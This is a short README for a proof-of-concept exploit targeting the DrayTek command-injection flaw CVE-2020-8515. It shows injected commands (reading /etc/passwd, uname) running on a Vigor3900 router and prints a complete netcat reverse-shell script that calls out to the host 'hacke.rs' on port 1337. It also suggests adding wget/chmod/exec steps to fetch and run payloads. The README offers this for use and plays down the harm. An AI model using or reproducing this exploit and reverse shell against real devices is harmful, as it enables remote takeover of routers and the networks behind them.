/CVE-2020-8515

Draytek CVE-2020-8515 PoC

Primary LanguagePython

CVE-2020-8515

Draytek CVE-2020-8515 PoC I had kicking about.

Amusingly, the command injected gets executed twice, see here:

$ ./draytek.py draytek.local
(>) executing command: cat /etc/passwd
(+) vulnerable!
(>) executing command: uname -a
Linux Vigor3900 2.6.33.5 #1 Wed Mar 28 00:49:28 CST 2018 armv6l unknown
Linux Vigor3900 2.6.33.5 #1 Wed Mar 28 00:49:28 CST 2018 armv6l unknown

I had some plans to polish this one off nicely, but honestly, its like what, a year later and I can't remember what those plans were, so here you go. It isn't hard to add some wget/chmod/exec stuff to this, just look in the "do_stuff" function.

If you wget down and run a script like the following, you do get a reverse shell:

#!/bin/sh
HOST="hacke.rs"
PORT=1337
rm -f /tmp/a; mkfifo /tmp/a; nc $HOST $PORT 0</tmp/a | /bin/sh >/tmp/a 2>&1; rm /tmp/a

I think you can probably also echoload such a script if you can get around bad chars in the injection, maybe I'll add that later - the double-execution problem really makes that a bit of a chore though. For now, this is kind of half-baked, "user decides".

This exploit won't cause much harm ITW, all the boxes vulnerable to this have probably been coopted by script kiddies DDoS botnets already.

For scanning: use the nuclei template someone made